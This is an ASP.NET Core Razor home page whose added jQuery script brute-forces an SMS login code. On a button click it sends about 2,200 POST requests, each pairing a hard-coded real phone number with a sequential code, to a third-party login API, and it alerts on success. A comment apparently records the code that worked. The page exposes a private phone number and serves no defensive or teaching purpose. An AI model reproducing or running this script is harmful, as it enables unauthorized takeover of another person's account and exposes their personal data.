@{
    ViewData["Title"] = "Home Page";
}

<div class="text-center">
    <h1 class="display-4">Welcome</h1>
    <p>Learn about <a href="https://docs.microsoft.com/aspnet/core">building Web apps with ASP.NET Core</a>.</p>
</div>
<input type="button" value="测试" id="btnTest" />
<script src="~/lib/jquery/dist/jquery.js"></script>
<script type="text/javascript">

    $(function () {
        $("#btnTest").click(function () {//203904
            for (var i = 201800; i < 204000; i++) {
                $.ajax({
                    type: "post",
                    data: { tel: '13023915837', code: i },
                    url: 'https://dc.keytop.cn/normal/api/v1/user/telLogin',
                    dataType: "json",
                    success: function (res) {
                        if (res.resultCode == 200) {
                            console.log(res);
                            alert("登录成功，请求数据" + this.data);
                        } else {
                            console.log(res.resultMsg);
                        }
                    }
                });
            }

        });

    });

</script>